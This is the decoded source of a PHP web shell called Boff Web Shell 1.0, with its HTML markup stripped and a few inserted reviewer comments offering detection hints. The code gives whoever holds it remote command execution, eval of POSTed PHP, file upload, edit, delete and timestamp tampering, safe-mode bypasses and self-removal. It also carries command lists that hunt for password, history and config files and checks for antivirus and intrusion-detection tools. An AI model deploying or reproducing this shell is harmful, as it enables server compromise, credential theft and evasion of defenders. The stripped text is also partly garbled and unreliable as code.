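/* Decoded by unphp.net. Reviewer note: what follows is the decoded body of a PHP web shell (the banner below is leetspeak for "Boff Web Shell 1.0"). The text appears to be a quoted byte-string dump with the HTML markup stripped, so quotes are backslash-escaped and the echo strings are incomplete. */ ?>b' Authorization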
ß0ff \/\/3ß $|-|311 1.0
Password: >\'>
"); } if(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])])) if( empty($auth_pass) || ( isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; else BOFFLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = \'win\'; else $os = \'nix\'; $safe_mode = @ini_get(\'safe_mode\'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get(\'disable_functions\'); $home_cwd = @getcwd(); if(isset($_POST[\'c\'])) @chdir($_POST[\'c\']); $cwd = @getcwd(); if($os == \'win\') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\'; if(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$GLOBALS[\'default_use_ajax\']; if($os == \'win\') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . 
-type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function BOFFHeader() { 
if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = $GLOBALS[\'default_charset\']; global $color; echo "" . $_SERVER[\'HTTP_HOST\'] . " - BOFF " . BOFF_VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS[\'cwd\']); $totalSpace = @disk_total_space($GLOBALS[\'cwd\']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname(\'r\'); $kernel = @php_uname(\'s\'); $explink = \'http://exploit-db.com/list.php?description=\'; if(strpos(\'Linux\', $kernel) !== false) $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6)); else $explink .= urlencode($kernel . \' \' . substr($release,0,3)); if(!function_exists(\'posix_getegid\')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid[\'name\']; $uid = $uid[\'uid\']; $group = $gid[\'name\']; $gid = $gid[\'gid\']; } $cwd_links = \'\'; $path = explode("/", $GLOBALS[\'cwd\']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\'); $opt_charsets = \'\'; foreach($charsets as $item) $opt_charsets .= \'\'; $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\'); if(!empty($GLOBALS[\'auth_pass\'])) $m[\'Logout\'] = \'Logout\'; $m[\'Self remove\'] = \'SelfRemove\'; $menu = \'\'; foreach($m as $k => $v) $menu .= \'[ \'.$k.\' ]\'; $drives = ""; if($GLOBALS[\'os\'] == \'win\') { foreach(range(\'c\',\'z\') as $drive) if(is_dir($drive.\':\\')) $drives .= \'[ \'.$drive.\' ] \'; } echo \'\' . \'\' . \'
Uname:
User:
Php:
Hdd:
Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\') . \'
\' . substr(@php_uname(), 0, 120) . \' [exploit-db.com]
\' . $uid . \' ( \' . $user . \' ) Group: \' . $gid . \' ( \' . $group . \' )
\' . @phpversion() . \' Safe mode: \' . ($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\') . \' [ phpinfo ] Datetime: \' . date(\'Y-m-d H:i:s\') . \'
\' . BOFFViewSize($totalSpace) . \' Free: \' . BOFFViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)
\' . $cwd_links . \' \'. BOFFPermsColor($GLOBALS[\'cwd\']) . \' [ home ]
\' . $drives . \'

Server IP:
\' . @$_SERVER["SERVER_ADDR"] . \'
Client IP:
\' . $_SERVER[\'REMOTE_ADDR\'] . \'
\' . \'\' . $menu . \'
\'; } function BOFFFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
>\'>
Read file:
>\'>
Make dir:$is_writable
>\'>
Make file:$is_writable
>\'>
Execute:
>\'>
Upload file:$is_writable
>\'>

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} } function BOFFEx($in) { $out = \'\'; if (function_exists(\'exec\')) { @exec($in,$out); $out = @join(" ",$out); } elseif (function_exists(\'passthru\')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists(\'system\')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function BOFFViewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\'; elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\'; elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\'; else return $s . \' B\'; } function BOFFPerms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\'; elseif (($p & 0xA000) == 0xA000)$i = \'l\'; elseif (($p & 0x8000) == 0x8000)$i = \'-\'; elseif (($p & 0x6000) == 0x6000)$i = \'b\'; elseif (($p & 0x4000) == 0x4000)$i = \'d\'; elseif (($p & 0x2000) == 0x2000)$i = \'c\'; elseif (($p & 0x1000) == 0x1000)$i = \'p\'; else $i = \'u\'; $i .= (($p & 0x0100) ? \'r\' : \'-\'); $i .= (($p & 0x0080) ? \'w\' : \'-\'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\')); $i .= (($p & 0x0020) ? \'r\' : \'-\'); $i .= (($p & 0x0010) ? \'w\' : \'-\'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\')); $i .= (($p & 0x0004) ? \'r\' : \'-\'); $i .= (($p & 0x0002) ? \'w\' : \'-\'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? 
\'T\' : \'-\')); return $i; } function BOFFPermsColor($f) { if (!@is_readable($f)) return \'\' . BOFFPerms(@fileperms($f)) . \'\'; elseif (!@is_writable($f)) return \'\' . BOFFPerms(@fileperms($f)) . \'\'; else return \'\' . BOFFPerms(@fileperms($f)) . \'\'; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function BOFFWhich($p) { $path = BOFFEx(\'which \' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { BOFFHeader(); echo \'

Server security information

\'; function BOFFSecParam($n, $v) { $v = trim($v); if($v) { echo \'\' . $n . \': \'; if(strpos($v, " ") === false) echo $v . \'
\'; else echo \'
\' . $v . \'
\'; } } BOFFSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\')); if(function_exists(\'apache_get_modules\')) BOFFSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules())); BOFFSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\'); BOFFSecParam(\'Open base dir\', @ini_get(\'open_basedir\')); BOFFSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\')); BOFFSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\')); BOFFSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\'); $temp=array(); if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL"; if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL"; if(function_exists(\'oci_connect\')) $temp[] = "Oracle"; BOFFSecParam(\'Supported databases\', implode(\', \', $temp)); echo \'
\'; if($GLOBALS[\'os\'] == \'nix\') { BOFFSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\'); BOFFSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\'); BOFFSecParam(\'OS version\', @file_get_contents(\'/proc/version\')); BOFFSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\')); if(!$GLOBALS[\'safe_mode\']) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\'); $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\'); $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\'); echo \'
\'; $temp=array(); foreach ($userful as $item) if(BOFFWhich($item)) $temp[] = $item; BOFFSecParam(\'Userful\', implode(\', \',$temp)); $temp=array(); foreach ($danger as $item) if(BOFFWhich($item)) $temp[] = $item; BOFFSecParam(\'Danger\', implode(\', \',$temp)); $temp=array(); foreach ($downloaders as $item) if(BOFFWhich($item)) $temp[] = $item; BOFFSecParam(\'Downloaders\', implode(\', \',$temp)); echo \'
\'; BOFFSecParam(\'HDD space\', BOFFEx(\'df -h\')); BOFFSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\')); } } else { BOFFSecParam(\'OS Version\',BOFFEx(\'ver\')); BOFFSecParam(\'Account Settings\',BOFFEx(\'net accounts\')); BOFFSecParam(\'User Accounts\',BOFFEx(\'net user\')); } echo \'
\'; BOFFFooter(); } function actionPhp() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = true; ob_start(); eval($_POST[\'p1\']); $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), " \\'") . "\'; "; echo strlen($temp), " ", $temp; exit; } BOFFHeader(); if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) { echo \'

PHP info

\'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(\'!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp); $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp); echo str_replace(\'
\'; } if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = false; echo \'

Execution PHP-code

\'; echo \' send using AJAX
\';
	// Reviewer note (non-AJAX branch of actionPhp): when POST field 'p1' is
	// non-empty, its contents are handed directly to eval(), so PHP source sent by
	// the client runs inside this PHP process. Output printed by the evaluated code
	// is captured with output buffering and HTML-escaped before being echoed back.
	// The only access gate visible on this page is the session flag set at the top
	// of the script after the md5($_POST['pass']) == $auth_pass comparison, and that
	// check is skipped entirely when $auth_pass is empty.
	// For detection: eval() applied directly to a $_POST value is a strong static
	// indicator when scanning a web root, and request logs would show POSTs whose
	// 'p1' field carries PHP source.
	if(!empty($_POST[\'p1\'])) {
		ob_start();
		eval($_POST[\'p1\']);
		echo htmlspecialchars(ob_get_clean());
	}
	echo \'
\'; BOFFFooter(); } function actionFilesMan() { BOFFHeader(); echo \'

File manager

\'; if(!empty($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!"; break; case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir"; break; case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { if($f == \'..\') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'c\'],$f, $GLOBALS[\'cwd\']); } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'c\'].$f, $GLOBALS[\'cwd\'].$f); } elseif($_SESSION[\'act\'] == \'zip\') { if(class_exists(\'ZipArchive\')) { $zip = new ZipArchive(); if ($zip->open($_POST[\'p2\'], 1)) { chdir($_SESSION[\'c\']); foreach($_SESSION[\'f\'] as $f) { if($f == \'..\') continue; if(@is_file($_SESSION[\'c\'].$f)) $zip->addFile($_SESSION[\'c\'].$f, $f); elseif(@is_dir($_SESSION[\'c\'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\')); 
foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS[\'cwd\']); $zip->close(); } } } elseif($_SESSION[\'act\'] == \'unzip\') { if(class_exists(\'ZipArchive\')) { $zip = new ZipArchive(); foreach($_SESSION[\'f\'] as $f) { if($zip->open($_SESSION[\'c\'].$f)) { $zip->extractTo($GLOBALS[\'cwd\']); $zip->close(); } } } } elseif($_SESSION[\'act\'] == \'tar\') { chdir($_SESSION[\'c\']); $_SESSION[\'f\'] = array_map(\'escapeshellarg\', $_SESSION[\'f\']); BOFFEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_SESSION[\'f\'])); chdir($GLOBALS[\'cwd\']); } unset($_SESSION[\'f\']); break; default: if(!empty($_POST[\'p1\'])) { $_SESSION[\'act\'] = @$_POST[\'p1\']; $_SESSION[\'f\'] = @$_POST[\'f\']; foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f); $_SESSION[\'c\'] = @$_POST[\'c\']; } break; } } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']); if($dirContent === false) { echo \'Can\'t open this folder!\';BOFFFooter(); return; } global $sort; $sort = array(\'name\', 1); if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])), \'perms\' => BOFFPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[\'cwd\'] . 
$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\')); elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\']))); elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\')); } $GLOBALS[\'sort\'] = $sort; function BOFFCmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1); else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1); } usort($files, "BOFFCmp"); usort($dirs, "BOFFCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo \'\'; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');" title=\' . $f[\'link\'] . \'>[ \' . htmlspecialchars($f[\'name\']) . \' ]\').\'\'.(($f[\'type\']==\'file\')?BOFFViewSize($f[\'size\']):$f[\'type\']).\'\'.$f[\'modify\'].\'\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'\'.$f[\'perms\'] .\'R T\'.(($f[\'type\']==\'file\')?\' E D\':\'\').\'
 "; if(!empty($_SESSION[\'act\']) && @count($_SESSION[\'f\']) && (($_SESSION[\'act\'] == \'zip\') || ($_SESSION[\'act\'] == \'tar\'))) echo "file name:  "; echo ">\'>
"; BOFFFooter(); } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'binhex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', ); if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; ob_start(); if(in_array($_POST[\'p1\'], $stringTools)) echo $_POST[\'p1\']($_POST[\'p2\']); $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean())," \\'")."\'; "; echo strlen($temp), " ", $temp; exit; } BOFFHeader(); echo \'

String conversions

\'; if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; echo "
>\'/> send using AJAX
";
	// Reviewer note (non-AJAX branch of actionStringTools): POST 'p1' is used as a
	// function name and invoked with POST 'p2' as its single argument (a PHP
	// variable-function call). The call happens only when 'p1' matches one of the
	// values of $stringTools, the label => function-name table built earlier in
	// this function, so unlike the eval() path in actionPhp the callable is limited
	// to that list. The result is HTML-escaped before output.
	if(!empty($_POST[\'p1\'])) {
		if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));
	}
	echo"

Search text in files:

Text:
Path:
Name:
>\'>
"; function BOFFRecursiveGlob($path) { if(substr($path, -1) != \'/\') $path.=\'/\'; $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) BOFFRecursiveGlob($item); } else { if(@strpos(@file_get_contents($item), @$_POST[\'p2\'])!==false) echo "".htmlspecialchars($item)."
"; } } } } if(@$_POST[\'p3\']) BOFFRecursiveGlob($_POST[\'c\']); echo "

Search for hash:







"; BOFFFooter(); } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']); if(@$_POST[\'p2\']==\'download\') { if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST[\'p1\'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\'); if($fp) { $_POST[\'p2\'] = "edit"; fclose($fp); } } } BOFFHeader(); echo \'

File tools

\'; if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\'; BOFFFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\'])); if(!$uid) { $uid[\'name\'] = @fileowner($_POST[\'p1\']); $gid[\'name\'] = @filegroup($_POST[\'p1\']); } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\'])); echo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?BOFFViewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.BOFFPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\'; echo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\'; if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\'; if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\'); else $m = array(\'Chmod\', \'Rename\', \'Touch\'); foreach($m as $v) echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \'; echo \'

\'; switch($_POST[\'p2\']) { case \'view\': echo \'
\';
			// Reviewer note ('view' case of actionFilesTools): opens the path taken from
			// POST 'p1' (url-decoded at the top of actionFilesTools) for reading and
			// streams it into the response in 1024-byte chunks, HTML-escaping each chunk.
			// The visible code applies no restriction to the path beyond the earlier
			// file_exists() check, so any file the PHP process can read can be displayed.
			// The @ operators suppress warnings from fopen/feof/fread/fclose, so failed
			// reads leave no PHP warning in the error log.
			$fp = @fopen($_POST[\'p1\'], \'r\');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo \'
\'; break; case \'highlight\': if( @is_readable($_POST[\'p1\']) ) { echo \'
\'; $code = @highlight_file($_POST[\'p1\'],true); echo str_replace(array(\'\'), array(\'\'),$code).\'
\'; } break; case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0; for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1)); if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\'t set permissions!
\'; } clearstatcache(); echo \'
\'; break; case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\'t writeable\'; break; } if( !empty($_POST[\'p3\']) ) { $time = @filemtime($_POST[\'p1\']); $_POST[\'p3\'] = substr($_POST[\'p3\'],1); $fp = @fopen($_POST[\'p1\'],"w"); if($fp) { @fwrite($fp,$_POST[\'p3\']); @fclose($fp); echo \'Saved!
\'; @touch($_POST[\'p1\'],$time,$time); } } echo \'
\'; break; case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']); $n = 0; $h = array(\'00000000
\',\'\',\'\'); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \'; switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \'; break; case 9: $h[2] .= \' \'; break; case 10: $h[2] .= \' \'; break; case 13: $h[2] .= \' \'; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'
\';} $h[1] .= \'
\'; $h[2] .= " "; } } echo \'
\'.$h[0].\'
\'.$h[1].\'
\'.htmlspecialchars($h[2]).\'
\'; break; case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\'t rename!
\'; else die(\'\'); } echo \'
\'; break; case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']); if($time) { if(!touch($_POST[\'p1\'],$time,$time)) echo \'Fail!\'; else echo \'Touched!\'; } else echo \'Bad time format!\'; } clearstatcache(); echo \'
\'; break; } echo \'
\'; BOFFFooter(); } function actionSafeMode() { $temp=\'\'; ob_start(); switch($_POST[\'p1\']) { case 1: $temp=@tempnam($test, \'cx\'); if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo \'Sorry... Can\'t open file\'; break; case 2: $files = glob($_POST[\'p2\'].\'*\'); if( is_array($files) ) foreach ($files as $filename) echo $filename." "; break; case 3: $ch = curl_init("file://".$_POST[\'p2\']."".preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__)); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST[\'p2\']); break; case 5: for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) { $uid = @posix_getpwuid($_POST[\'p2\']); if ($uid) echo join(\':\',$uid)." "; } break; } $temp = ob_get_clean(); BOFFHeader(); echo \'

Safe mode bypass

